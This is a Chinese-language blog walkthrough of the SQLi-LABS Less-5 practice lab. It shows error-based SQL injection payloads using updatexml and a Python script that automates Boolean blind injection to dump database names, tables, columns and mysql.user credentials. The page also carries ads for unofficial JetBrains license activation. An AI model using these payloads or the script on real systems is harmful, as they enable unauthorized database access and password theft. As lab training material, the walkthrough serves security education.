SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」sqlilabs第五关,sqli-labesless-5,sqlilabsless5

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

第五关是单引号字符型注入,推荐使用报错注入、布尔盲注

方式一:报错注入

推荐文章:报错注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1′

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 单引号导致,页面显示数据库的报错信息,确定注入点为单引号字符型

第二步、判断报错报错函数是否可用

地址栏输入:?id=0′ and updatexml(1,0x7e,3) — a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 页面正常报错,确定报错函数可用。

第三步、脱库

获取所有数据库,地址栏输入:

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(schema_name) 
          from information_schema.schemata)
       )
	,34,31)
,3) -- a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

获取 security 库中的所有表,地址栏输入:

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(table_name) 
          from information_schema.tables
          where table_schema="security")
       )
	,1,31)
,3) -- a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 获取 users 表中的所有字段,地址栏输入:

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(column_name) 
          from information_schema.columns
          where table_schema="security" and table_name="users")
       )
	,1,31)
,3) -- a

 SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 获取数据库的管理员的密码,地址栏输入:

?id=1' and updatexml(1,
	concat(0x7e,(
        select group_concat(user,password) 
        from mysql.user 
        where user = 'mituan')
     ),
3) -- a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 

方式二:布尔盲注

推荐文章:布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1′ and 1 — a,页面正常显示 

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 地址栏输入:?id=1′ and 0 — a,页面异常(空)显示

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

第二步、判断长度

判断当前所有数据库的长度是否大于2(肯定大于),地址栏输入:

?id=1' and length(
	(select group_concat(schema_name)
    from information_schema.schemata)
) > 2 -- a

 SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 页面正常显示,确定payload可用,文末使用脚本自动化判断

第三步、枚举字符

判断所有数据库名的第1个字符的ascll码是否大于1(肯定大于1),地址栏输入:

?id=1' and ascii(
	substr(
		(select group_concat(schema_name)
		from information_schema.schemata)
	,1,1)
) >1 -- a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 页面正常显示,确定payload可用,文末使用脚本枚举字符。

第四步、脱库

盲注脚本如下,按照提示修改:

import requests

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址(不带参数)
url = "http://70ee4e0d244e4ca5a00526d0f4e48b26.app.mituan.zone/Less-5/"
# 猜解长度使用的payload
payload_len = """?id=1' and length(
	                (select group_concat(user,password)
                    from mysql.user)
                ) = {n} -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' and ascii(
	                substr(
		                (select group_concat(user,password)
		                from mysql.user)
	                ,{n},1)
                ) = {r} -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面中出现此内容则表示成功
        if 'You are in...........' in response.text:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # 页面中出现此内容则表示成功
            if 'You are in...........' in response.text:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

获取所有数据库

判断长度的payload:

?id=1' and length(
	(select group_concat(schema_name)
    from information_schema.schemata)
) ={n} -- a

枚举字符的payload:

?id=1' and ascii(
	substr(
		(select group_concat(schema_name)
		from information_schema.schemata)
	,{n},1)
) ={r} -- a

执行结果:

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 获取 security 库中的所有表

判断长度的payload:

?id=1' and length(
	(select group_concat(table_name)
    from information_schema.tables
    where table_schema="security")
) ={n} -- a

枚举字符的payload:

?id=1' and ascii(
	substr(
		(select group_concat(table_name)
		from information_schema.tables
        where table_schema="security")
	,{n},1)
) ={r} -- a

执行结果:

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 获取 users 表的所有字段

判断长度的payload:

?id=1' and length(
	(select group_concat(column_name)
    from information_schema.columns
    where table_schema="security" and table_name="users")
) ={n} -- a

枚举字符的payload:

?id=1' and ascii(
	substr(
		(select group_concat(column_name)
		from information_schema.columns
        where table_schema="security" and table_name="users")
	,{n},1)
) ={r} -- a

执行结果:

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 推荐专栏

《网络安全快速入门》用最短的时间,掌握最核心的网络安全技术。

《靶场通关教程》各种靶场的通关教程,持续更新……

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/187726.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • 《JavaScript 模式》读书笔记(4)— 函数4

    这篇文章我们主要来学习下即时对象初始化、初始化时分支、函数属性-备忘模式以及配置对象。这篇的内容会有点多。六、即时对象初始化保护全局作用域不受污染的另一种方法,即时对象初始化模式。这种模式使用带有

  • Eclipse 的中文简体版安装教程「建议收藏」

    Eclipse的中文简体版安装教程进行这个教程之前,请先完成JDK的安装。关于JDK的安装,请见笔者的另一博客:JDK的安装:https://blog.csdn.net/wangpaiblog/article/details/111466827下面开始介绍安装文件从网上获取的途径。进入Eclipse官网,下载免安装版。因为是国外的网站,所以可能网站加载缓慢。部分浏览器可能禁用此网站上的某些控件,所以如下的过程如果发现网站上缺失某些界面选项,可以试试换个浏览器。(网址:https://www.

  • 广州大学计算机控制实验,计算机网络实验三

    广州大学计算机控制实验,计算机网络实验三

    2021年11月27日
  • screentogif全屏录制_录屏转gif手机版

    screentogif全屏录制_录屏转gif手机版作者:虚坏叔叔博客:https://xuhss.com早餐店不会开到晚上,想吃的人早就来了!?ScreenToGif录制软件的通用设置,优化使用体验在写博客的过程中习惯使用ScreenToGif来录制操作。在当下个人计算机性能内存搓搓有余的情况下,如何能够让这款软件非常好用呢?一、快捷键设置1.快速后台启动录屏窗口通过设置Ctrl+Alt+R能够快速启动软件二、关闭软件不退出有时,我需要让这个软件一直在后台运行,因为这块软件占的内存并不是很大:我们希望一直在后台运行即使关闭了

  • hadoop默认对3个副本的存储策略和执行策略:「建议收藏」

    hadoop默认对3个副本的存储策略和执行策略:「建议收藏」hadoop默认对3个副本的存储策略和执行策略:

  • 多线程之旅(10)_QueueUserWorkItem和UnsafeQueueUserWorkItem的区别「建议收藏」

    多线程之旅(10)_QueueUserWorkItem和UnsafeQueueUserWorkItem的区别「建议收藏」这是个比较冷门的点,是我在写多线程之旅(2)_创建一个属于自己的精简线程池_线程调度策略——附C#源码这篇文章时,发现在做线程队列时,官方选用的是UnsafeQueueUserWorkItem,而不是常见的QueueUserWorkItem,所以后续我就对这两个方法调查一番,发现资料也不多,总结一下。一、官方定义首先看一下官方的定义:来源:https://docs.microsof…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号